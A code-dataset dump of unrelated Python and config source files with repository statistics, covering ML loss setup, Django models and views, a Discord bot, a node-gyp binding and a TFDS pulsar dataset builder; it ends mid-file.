from wilds.common.metrics.loss import ElementwiseLoss, Loss, MultiTaskLoss
from wilds.common.metrics.all_metrics import MSE
def initialize_loss(config, d_out):
if config.get('loss_function') == 'cross_entropy':
return ElementwiseLoss(loss_fn=nn.CrossEntropyLoss(reduction='none'))
elif config.get('loss_function') == 'lm_cross_entropy':
return MultiTaskLoss(loss_fn=nn.CrossEntropyLoss(reduction='none'))
elif config.get('loss_function') == 'mse':
return MSE(name='loss')
elif config.get('loss_function') == 'multitask_bce':
return MultiTaskLoss(loss_fn=nn.BCEWithLogitsLoss(reduction='none'))
elif config.get('loss_function') == 'fasterrcnn_criterion':
from models.detection.fasterrcnn import FasterRCNNLoss
return ElementwiseLoss(loss_fn=FasterRCNNLoss(config.get('device')))
else:
raise ValueError(f'config.get("loss_function") {config.get("loss_function")} not recognized')
| 42.041667 | 102 | 0.712587 | 119 | 1,009 | 5.882353 | 0.386555 | 0.102857 | 0.13 | 0.21 | 0.332857 | 0.231429 | 0.231429 | 0.177143 | 0.177143 | 0.177143 | 0 | 0 | 0.164519 | 1,009 | 23 | 103 | 43.869565 | 0.830368 | 0 | 0 | 0 | 0 | 0 | 0.227181 | 0.056795 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.235294 | 0 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f7d05cdadbe916b87c1a42529726834ede81ee00 | 456 | py | Python | tutorials/W0D3_LinearAlgebra/solutions/W0D3_Tutorial1_Solution_ff7c6b75.py | sjbabdi/course-content | 801890b0460ceb26b34f3ee784f4af26dacd74a5 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | 1 | 2021-06-29T06:11:47.000Z | 2021-06-29T06:11:47.000Z | tutorials/W0D3_LinearAlgebra/solutions/W0D3_Tutorial1_Solution_ff7c6b75.py | macasal/course-content | 0fc5e1a0d736c6b0391eeab587012ed0ab01e462 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | 1 | 2021-06-16T05:41:08.000Z | 2021-06-16T05:41:08.000Z | tutorials/W0D3_LinearAlgebra/solutions/W0D3_Tutorial1_Solution_ff7c6b75.py | macasal/course-content | 0fc5e1a0d736c6b0391eeab587012ed0ab01e462 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null |
# 1) They are linearly dependent as one can be formed as a linear combination of
# the others (a + b = c). You could also have known this because you have four
#. 3D vectors. You don't need 4 vectors to get anywhere in 3D space!
#.
# 2) The span of a, b, c, and d is all of 3D space (R^3).
# 3) The span of a and b is a 1D line through 3D space (note this is not R^1)
# 4) The span of a and b is a 2d plane through 3D space (note this is not R^2) | 45.6 | 82 | 0.675439 | 100 | 456 | 3.08 | 0.52 | 0.090909 | 0.087662 | 0.097403 | 0.292208 | 0.292208 | 0.292208 | 0.292208 | 0 | 0 | 0 | 0.04386 | 0.25 | 456 | 10 | 83 | 45.6 | 0.856725 | 0.962719 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f7e92b70a7b7566cf1e062ba36fed8e3768f15fb | 1,926 | py | Python | client-tutorial/client_tutorial/ReportsDao.py | dixonwhitmire/connect-clients | 09bf6f53f0a4fc923d1fb18f75ce86521880517c | [
"Apache-2.0"
] | null | null | null | client-tutorial/client_tutorial/ReportsDao.py | dixonwhitmire/connect-clients | 09bf6f53f0a4fc923d1fb18f75ce86521880517c | [
"Apache-2.0"
] | 6 | 2021-07-13T19:58:58.000Z | 2021-11-02T21:25:14.000Z | client-tutorial/client_tutorial/ReportsDao.py | dixonwhitmire/connect-clients | 09bf6f53f0a4fc923d1fb18f75ce86521880517c | [
"Apache-2.0"
] | 1 | 2021-07-13T19:22:04.000Z | 2021-07-13T19:22:04.000Z | # Copyright (c) 2021 IBM Corporation
# Henry Feldman, MD (CMO Development, IBM Watson Health)
from databaseUtil import DatabaseUtil
from typing import List
from database_classes import RadiologyReport, EKGReport
class ReportsDao:
"""
the collection of methods to fetch report entities (radiology, EKG...) from the database
"""
session = None
def __init__(self):
"""
setup and fetch the database session from the database utility.
"""
dbUtil = DatabaseUtil()
self.session = dbUtil.getSession()
def getAllRadiologyReports(self)->List[RadiologyReport]:
"""
gets the list of radiology reports out of the database
@return: radiologyReportsList
@rtype: List[RadiologyReport]
"""
global session
return self.session.query(RadiologyReport).all()
def getRadiologyReportsForPatient(self,subjectId:int)->List[RadiologyReport]:
"""
gets the list of radiology reports out of the database for a specific aptient by their subjectid\
@param subjectId:
@type subjectId:
@return: radiologyReportsList
@rtype: List[RadiologyReport]
"""
global session
return self.session.query(RadiologyReport).filter(RadiologyReport.SUBJECT_ID==subjectId).all()
def getAllEKGReports(self)->List[EKGReport]:
"""
gets the list of EKG reports out of the database
@return: ekgReports
@rtype: List[EKGReport]
"""
global session
return self.session.query(EKGReport).all()
def getAllEKGReportsForPatient(self,subjectId:int) -> List[EKGReport]:
"""
gets the list of EKG reports out of the database
@return: ekgReports
@rtype: List[EKGReport]
"""
global session
return self.session.query(EKGReport).filter(EKGReport.SUBJECT_ID==subjectId).all()
| 32.644068 | 105 | 0.656802 | 200 | 1,926 | 6.29 | 0.35 | 0.061208 | 0.034976 | 0.041335 | 0.467409 | 0.467409 | 0.467409 | 0.467409 | 0.467409 | 0.467409 | 0 | 0.002795 | 0.257009 | 1,926 | 58 | 106 | 33.206897 | 0.87631 | 0.386812 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.15 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f7f77eff8efdfdd454b5bb13512b1a20955a8f7c | 2,082 | py | Python | detools/data_format/__init__.py | advmach/detools | 2b7b98bb8e5eb1232d15cb1731fe72f8954a2d09 | [
"BSD-2-Clause"
] | 119 | 2019-02-23T07:48:11.000Z | 2022-03-23T20:45:51.000Z | detools/data_format/__init__.py | advmach/detools | 2b7b98bb8e5eb1232d15cb1731fe72f8954a2d09 | [
"BSD-2-Clause"
] | 6 | 2020-01-27T11:15:32.000Z | 2021-09-15T17:58:34.000Z | detools/data_format/__init__.py | advmach/detools | 2b7b98bb8e5eb1232d15cb1731fe72f8954a2d09 | [
"BSD-2-Clause"
] | 10 | 2019-04-23T17:28:48.000Z | 2022-02-14T05:35:31.000Z | from collections import defaultdict
from operator import itemgetter
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
from ..errors import Error
from ..common import DATA_FORMAT_AARCH64
from ..common import DATA_FORMAT_ARM_CORTEX_M4
from ..common import DATA_FORMAT_XTENSA_LX106
from ..common import format_bad_data_format
from ..common import format_bad_data_format_number
from . import aarch64
from . import arm_cortex_m4
from . import xtensa_lx106
def encode(ffrom, fto, data_format, data_segment):
"""Returns the new from-data and to-data, along with a patch that can
be used to convert the new from-data to the original to-data later
(by the diff and from readers).
"""
if data_format == 'aarch64':
return aarch64.encode(ffrom, fto, data_segment)
elif data_format == 'arm-cortex-m4':
return arm_cortex_m4.encode(ffrom, fto, data_segment)
elif data_format == 'xtensa-lx106':
return xtensa_lx106.encode(ffrom, fto, data_segment)
else:
raise Error(format_bad_data_format(data_format))
def create_readers(data_format, ffrom, patch, to_size):
"""Returns diff and from readers, used when applying a patch.
"""
if data_format == DATA_FORMAT_AARCH64:
return aarch64.create_readers(ffrom, patch, to_size)
elif data_format == DATA_FORMAT_ARM_CORTEX_M4:
return arm_cortex_m4.create_readers(ffrom, patch, to_size)
elif data_format == DATA_FORMAT_XTENSA_LX106:
return xtensa_lx106.create_readers(ffrom, patch, to_size)
else:
raise Error(format_bad_data_format_number(data_format))
def info(data_format, patch, fsize):
"""Returns an info string.
"""
if data_format == DATA_FORMAT_AARCH64:
return aarch64.info(patch, fsize)
elif data_format == DATA_FORMAT_ARM_CORTEX_M4:
return arm_cortex_m4.info(patch, fsize)
elif data_format == DATA_FORMAT_XTENSA_LX106:
return xtensa_lx106.info(patch, fsize)
else:
raise Error(format_bad_data_format_number(data_format))
| 33.047619 | 73 | 0.741114 | 298 | 2,082 | 4.895973 | 0.204698 | 0.198766 | 0.060315 | 0.095956 | 0.611378 | 0.508568 | 0.488691 | 0.398903 | 0.275531 | 0.249486 | 0 | 0.028219 | 0.182997 | 2,082 | 62 | 74 | 33.580645 | 0.829512 | 0.121998 | 0 | 0.275 | 0 | 0 | 0.017857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0 | 0.325 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f7ffa73921d29299350bfec3addf3379899c9441 | 791 | py | Python | biodata/api/serializers.py | znatty22/biodataservice | a3eeb137d2e727a0fc58437b185f2637bc4665ed | [
"Apache-2.0"
] | null | null | null | biodata/api/serializers.py | znatty22/biodataservice | a3eeb137d2e727a0fc58437b185f2637bc4665ed | [
"Apache-2.0"
] | null | null | null | biodata/api/serializers.py | znatty22/biodataservice | a3eeb137d2e727a0fc58437b185f2637bc4665ed | [
"Apache-2.0"
] | null | null | null | from rest_framework import serializers
from biodata.api import models as m
COMMON_FIELDS = ['kf_id', 'created', 'modified']
class StudySerializer(serializers.ModelSerializer):
class Meta:
model = m.Study
fields = COMMON_FIELDS + ['name', 'short_name', 'participants']
read_only_fields = ['participants']
class ParticipantSerializer(serializers.ModelSerializer):
class Meta:
model = m.Participant
fields = COMMON_FIELDS + [
'gender', 'race', 'ethnicity', 'study', 'biospecimens',
]
read_only_fields = ['biospecimens']
class BiospecimenSerializer(serializers.ModelSerializer):
class Meta:
model = m.Biospecimen
fields = COMMON_FIELDS + [
'analyte_type', 'participant',
]
| 28.25 | 71 | 0.653603 | 74 | 791 | 6.824324 | 0.5 | 0.09505 | 0.184158 | 0.207921 | 0.243564 | 0.243564 | 0 | 0 | 0 | 0 | 0 | 0 | 0.240202 | 791 | 27 | 72 | 29.296296 | 0.840266 | 0 | 0 | 0.238095 | 0 | 0 | 0.163085 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.095238 | 0 | 0.380952 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7909a898d4e7c6b67303f014f5cd22ed7fddf740 | 222 | py | Python | Hackerrank/Practice/Python/9.erros and exceptions/66.Incorrect Regex.py | kushagra1212/Competitive-Programming | 5b68774c617d6abdf1b29893b1b13d47f62161e8 | [
"MIT"
] | 994 | 2017-02-28T06:13:47.000Z | 2022-03-31T10:49:00.000Z | Hackerrank_python/9.erros and exceptions/66.Incorrect Regex.py | devesh17m/Competitive-Programming | 2d459dc8dc5ac628d94700b739988b0ea364cb71 | [
"MIT"
] | 16 | 2018-01-01T02:59:55.000Z | 2021-11-22T12:49:16.000Z | Hackerrank_python/9.erros and exceptions/66.Incorrect Regex.py | devesh17m/Competitive-Programming | 2d459dc8dc5ac628d94700b739988b0ea364cb71 | [
"MIT"
] | 325 | 2017-06-15T03:32:43.000Z | 2022-03-28T22:43:42.000Z | # Enter your code here. Read input from STDIN. Print output to STOUT
import re
for _ in range(int(input())):
try:
re.compile(input())
print (True)
except re.error:
print (False)
| 24.666667 | 69 | 0.581081 | 30 | 222 | 4.266667 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.31982 | 222 | 8 | 70 | 27.75 | 0.847682 | 0.297297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
791417c95b4f230bcee2041f021a263fd00433b3 | 709 | py | Python | ref_bot/extension.py | tser0f/ref_bot | 8945992ec8802a88546494b503d7658cc53d80c5 | [
"MIT"
] | null | null | null | ref_bot/extension.py | tser0f/ref_bot | 8945992ec8802a88546494b503d7658cc53d80c5 | [
"MIT"
] | 1 | 2020-07-02T13:37:44.000Z | 2020-07-07T03:09:50.000Z | ref_bot/extension.py | tser0f/ref_bot | 8945992ec8802a88546494b503d7658cc53d80c5 | [
"MIT"
] | null | null | null | import ref_bot.cog.articlerefs
import importlib
import conf
from discord.ext import commands
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
def setup_dbsession():
engine = create_engine(conf.ini_config.get('sqlalchemy', 'connection_string'))
sessionm = sessionmaker()
sessionm.configure(bind=engine)
return sessionm()
def setup(bot):
print('ref_bot extension loading.')
dbsession = setup_dbsession()
importlib.reload(ref_bot.cog.articlerefs)
bot.remove_command('help')
bot.add_cog(ref_bot.cog.articlerefs.ArticleRefs(bot, dbsession))
def teardown(bot):
print('ref_bot extension unloading')
bot.remove_cog('ArticleRefs')
| 25.321429 | 86 | 0.750353 | 88 | 709 | 5.886364 | 0.431818 | 0.057915 | 0.052124 | 0.11583 | 0.088803 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150917 | 709 | 27 | 87 | 26.259259 | 0.860465 | 0 | 0 | 0 | 0 | 0 | 0.133992 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.35 | 0 | 0.55 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
79232ea3a4d5948b82480dc6e30eced57f3b9896 | 737 | py | Python | config/trades.py | ashwinath/stocks-graph | de92ef613f597e4dabba3226a70194000fd2ae70 | [
"Apache-2.0"
] | null | null | null | config/trades.py | ashwinath/stocks-graph | de92ef613f597e4dabba3226a70194000fd2ae70 | [
"Apache-2.0"
] | null | null | null | config/trades.py | ashwinath/stocks-graph | de92ef613f597e4dabba3226a70194000fd2ae70 | [
"Apache-2.0"
] | null | null | null | import os
import yaml
from google.protobuf import json_format
from generated.proto.trades_pb2 import TradeHistory
from generated.proto.config_pb2 import Config
from typing import List
def get_all_trade_configs(config: Config) -> List[TradeHistory]:
all_trade_histories = []
for dir_path, dir_names, file_names in os.walk(config.trades.folder):
for file_name in file_names:
file_path = os.path.join(dir_path, file_name)
with open(file_path, "r") as file:
trade_history = json_format.ParseDict(
yaml.safe_load(file),
TradeHistory(),
)
all_trade_histories.append(trade_history)
return all_trade_histories
| 33.5 | 73 | 0.671642 | 95 | 737 | 4.947368 | 0.442105 | 0.068085 | 0.108511 | 0.123404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003663 | 0.259159 | 737 | 21 | 74 | 35.095238 | 0.857143 | 0 | 0 | 0 | 1 | 0 | 0.001357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
f702ab8c70e4e0252724db9b6bec22b2fcca74e7 | 203 | py | Python | Ar_Script/past/eg_用户注册.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | null | null | null | Ar_Script/past/eg_用户注册.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | 1 | 2020-01-19T01:19:57.000Z | 2020-01-19T01:19:57.000Z | Ar_Script/past/eg_用户注册.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | null | null | null | import easygui as g
user_info=g.multenterbox(title='账号中心',msg='【*用户名】为必填项\t【*真实姓名】为必填项\t【*手机号码】为必填项\t【*E-mail】为必填项',
fields=['*用户名','*真实姓名','固定电话','*手机号码','QQ','*E-mail']
) | 40.6 | 96 | 0.55665 | 31 | 203 | 3.612903 | 0.645161 | 0.133929 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.182266 | 203 | 5 | 97 | 40.6 | 0.674699 | 0 | 0 | 0 | 0 | 0.25 | 0.401961 | 0.25 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f70509cbebb9afd7e84c6f7a0db27094fc3c5d62 | 1,155 | py | Python | bis/apps/gepiandashboard/views/reports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | 2 | 2021-03-03T16:16:42.000Z | 2021-03-08T22:43:10.000Z | bis/apps/gepiandashboard/views/reports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | null | null | null | bis/apps/gepiandashboard/views/reports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | null | null | null | """Reports views"""
# Django
from django.views.generic import TemplateView
# Shortcuts
from django.shortcuts import render
from django.shortcuts import redirect, reverse, get_object_or_404
from django.contrib.auth import authenticate
from django.http import (
HttpResponse,
HttpResponseNotFound,
HttpResponseServerError,
HttpResponseRedirect,
)
# Rest framework
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.permissions import (
IsAuthenticated,
IsAdminUser,
)
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
# Menus
from ...incubator.helpers.helperDictionaries import getReportsIndexMenus, getReportIndexAnalytics
class ReportsIndex(TemplateView):
template_name = 'gepiandashboard/pages/reports_index.html'
context = {}
def get(self, request):
if not request.user.is_authenticated:
return render(request, 'errors/401.html')
self.context['menus'] = getReportsIndexMenus()
self.context['analytics'] = getReportIndexAnalytics()
return render(request, self.template_name, self.context)
| 29.615385 | 97 | 0.772294 | 117 | 1,155 | 7.529915 | 0.512821 | 0.056754 | 0.077185 | 0.056754 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006129 | 0.152381 | 1,155 | 38 | 98 | 30.394737 | 0.893769 | 0.045022 | 0 | 0 | 0 | 0 | 0.063071 | 0.036563 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.37037 | 0 | 0.592593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f715dbd84fff6809be6f2c5c95ceb8898c2ac604 | 2,563 | gyp | Python | binding.gyp | sumeetkakkar/node-krb5 | 3c13021b3fcd3be239d3c731455154910f4d03b6 | [
"BSD-3-Clause"
] | null | null | null | binding.gyp | sumeetkakkar/node-krb5 | 3c13021b3fcd3be239d3c731455154910f4d03b6 | [
"BSD-3-Clause"
] | null | null | null | binding.gyp | sumeetkakkar/node-krb5 | 3c13021b3fcd3be239d3c731455154910f4d03b6 | [
"BSD-3-Clause"
] | 1 | 2019-08-29T18:45:47.000Z | 2019-08-29T18:45:47.000Z | {
"targets": [{
"target_name": "krb5",
"sources": [
"./src/module.cc",
"./src/krb5_bind.cc",
"./src/gss_bind.cc",
"./src/base64.cc"
],
'cflags!': ['-fno-exceptions'],
'cflags_cc!': ['-fno-exceptions'],
'include_dirs': ["<!@(node -p \"require('node-addon-api').include\")"],
'dependencies': ["<!(node -p \"require('node-addon-api').gyp\")"],
'cflags!': ['-fno-exceptions'],
'cflags_cc!': ['-fno-exceptions'],
'defines': [
'NAPI_DISABLE_CPP_EXCEPTIONS'
],
"conditions": [
[
"OS=='win'",
{
"variables": {
"KRB_PATH": "/Program Files/MIT/Kerberos"
},
"include_dirs": ["<(KRB_PATH)/include", "<(KRB_PATH)/include/gssapi", "src"],
"conditions": [
[
"target_arch=='x64'",
{
"msvs_settings": {
"VCCLCompilerTool": {
"AdditionalOptions": ["/MP /EHsc"]
},
"VCLinkerTool": {
"AdditionalLibraryDirectories": ["<(KRB_PATH)/lib/amd64/"]
}
},
"libraries": ["-lkrb5_64.lib", "-lgssapi64.lib"]
}
],
[
"target_arch=='ia32'",
{
"msvs_settings": {
"VCCLCompilerTool": {
"AdditionalOptions": ["/MP /EHsc"]
},
"VCLinkerTool": {
"AdditionalLibraryDirectories": ["<(KRB_PATH)/lib/amd64/"]
}
},
"libraries": ["-lkrb5_32.lib", "-lgssapi32.lib"]
}
]
]
}
],
[
"OS!='win'",
{
"libraries": ["-lkrb5", "-lgssapi_krb5"]
}
]
]
}]
}
| 36.614286 | 98 | 0.285603 | 124 | 2,563 | 5.725806 | 0.467742 | 0.049296 | 0.025352 | 0.070423 | 0.51831 | 0.51831 | 0.450704 | 0.338028 | 0.338028 | 0.338028 | 0 | 0.021978 | 0.573937 | 2,563 | 69 | 99 | 37.144928 | 0.628205 | 0 | 0 | 0.298507 | 0 | 0 | 0.317597 | 0.059696 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f718e4b6fe5e6cbcd80d9790d53329bb92e5e0b4 | 532 | py | Python | app/core/models.py | DevelopwithTom/simple_inventory_api | 5ce67be1c6ddbe7f5283256d52cf38779cbfdd89 | [
"MIT"
] | null | null | null | app/core/models.py | DevelopwithTom/simple_inventory_api | 5ce67be1c6ddbe7f5283256d52cf38779cbfdd89 | [
"MIT"
] | null | null | null | app/core/models.py | DevelopwithTom/simple_inventory_api | 5ce67be1c6ddbe7f5283256d52cf38779cbfdd89 | [
"MIT"
] | null | null | null | from django.db import models
import uuid
class Product(models.Model):
""" Creates and saves a new product """
sku = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False, unique=True)
name = models.CharField(max_length=255, blank=False, null=False)
quantity = models.IntegerField(blank=False, null=False)
price = models.DecimalField(max_digits=8, decimal_places=2)
def __str__(self):
return "Name: %s, Quantity Available: '%s', Price: £%s" % (self.name, self.quantity, self.price)
| 38 | 104 | 0.710526 | 74 | 532 | 5.013514 | 0.635135 | 0.053908 | 0.075472 | 0.102426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013393 | 0.157895 | 532 | 13 | 105 | 40.923077 | 0.8125 | 0.058271 | 0 | 0 | 0 | 0 | 0.093306 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0.111111 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
f725b5d9ea2e0f39b32bd5e6e8f910abfce3039b | 7,348 | py | Python | tensorflow_datasets/structured/htru2.py | jedlimlx/datasets | dffdc800d3d1f5c39f311f35de3530487153d335 | [
"Apache-2.0"
] | null | null | null | tensorflow_datasets/structured/htru2.py | jedlimlx/datasets | dffdc800d3d1f5c39f311f35de3530487153d335 | [
"Apache-2.0"
] | null | null | null | tensorflow_datasets/structured/htru2.py | jedlimlx/datasets | dffdc800d3d1f5c39f311f35de3530487153d335 | [
"Apache-2.0"
] | null | null | null | """Dataset for Predicting a Pulsar Star"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow_datasets.public_api as tfds
import tensorflow as tf
import os
_CITATION = """\
@article{10.1093/mnras/stw656,
author = {Lyon, R. J. and Stappers, B. W. and Cooper, S. and Brooke, J. M. and Knowles, J. D.},
title = "{Fifty years of pulsar candidate selection: from simple filters to a new principled real-time classification approach}",
journal = {Monthly Notices of the Royal Astronomical Society},
volume = {459},
number = {1},
pages = {1104-1123},
year = {2016},
month = {04},
abstract = "{Improving survey specifications are causing an exponential rise in pulsar candidate numbers and data volumes. We study the candidate filters used to mitigate these problems during the past 50 years. We find that some existing methods such as applying constraints on the total number of candidates collected per observation, may have detrimental effects on the success of pulsar searches. Those methods immune to such effects are found to be ill-equipped to deal with the problems associated with increasing data volumes and candidate numbers, motivating the development of new approaches. We therefore present a new method designed for online operation. It selects promising candidates using a purpose-built tree-based machine learning classifier, the Gaussian Hellinger Very Fast Decision Tree, and a new set of features for describing candidates. The features have been chosen so as to (i) maximize the separation between candidates arising from noise and those of probable astrophysical origin, and (ii) be as survey-independent as possible. Using these features our new approach can process millions of candidates in seconds (∼1 million every 15 s), with high levels of pulsar recall (90 per cent+). This technique is therefore applicable to the large volumes of data expected to be produced by the Square Kilometre Array. Use of this approach has assisted in the discovery of 20 new pulsars in data obtained during the Low-Frequency Array Tied-Array All-Sky Survey.}",
issn = {0035-8711},
doi = {10.1093/mnras/stw656},
url = {https://doi.org/10.1093/mnras/stw656},
eprint = {http://oup.prod.sis.lan/mnras/article-pdf/459/1/1104/8115310/stw656.pdf},
}
"""
_DESCRIPTION = """\
HTRU2 is a data set which describes a sample of pulsar candidates collected during the High Time Resolution Universe Survey (South).
Pulsars are a rare type of Neutron star that produce radio emission detectable here on Earth.
They are of considerable scientific interest as probes of space-time, the inter-stellar medium, and states of matter.
As pulsars rotate, their emission beam sweeps across the sky, and when this crosses our line of sight, produces a detectable pattern of broadband radio emission.
As pulsars rotate rapidly, this pattern repeats periodically.
Thus, pulsar search involves looking for periodic radio signals with large radio telescopes.
Each pulsar produces a slightly different emission pattern, which varies slightly with each rotation.
Thus a potential signal detection known as a 'candidate', is averaged over many rotations of the pulsar, as determined by the length of an observation.
In the absence of additional info, each candidate could potentially describe a real pulsar.
However, in practice almost all detections are caused by radio frequency interference (RFI) and noise, making legitimate signals hard to find.
Machine learning tools are now being used to automatically label pulsar candidates to facilitate rapid analysis.
Classification systems in particular are being widely adopted, which treat the candidate data sets as binary classification problems.
Here the legitimate pulsar examples are a minority positive class, and spurious examples the majority negative class.
At present multi-class labels are unavailable, given the costs associated with data annotation.
The data set shared here contains 16,259 spurious examples caused by RFI/noise, and 1,639 real pulsar examples.
These examples have all been checked by human annotators.
"""
_URL = "http://archive.ics.uci.edu/ml/machine-learning-databases/00372/HTRU2.zip"
class Htru2(tfds.core.GeneratorBasedBuilder):
"""Dataset for Predicting a Pulsar Star"""
VERSION = tfds.core.Version('2.0.0',
experiments={tfds.core.Experiment.S3: False})
def _info(self):
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION,
features=tfds.features.FeaturesDict({
"Features" : tfds.features.FeaturesDict({
"Mean of the integrated profile" : tf.float64,
"Standard deviation of the integrated profile" : tf.float64,
"Excess kurtosis of the integrated profile" : tf.float64,
"Skewness of the integrated profile" : tf.float64,
"Mean of the DM-SNR curve" : tf.float64,
"Standard deviation of the DM-SNR curve" : tf.float64,
"Excess kurtosis of the DM-SNR curve" : tf.float64,
"Skewness of the DM-SNR curve" : tf.float64,
}),
"Class" : tfds.features.ClassLabel(num_classes=2)
}),
supervised_keys=None,
homepage="https://archive.ics.uci.edu/ml/datasets/HTRU2",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
path = dl_manager.download_and_extract(_URL)
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
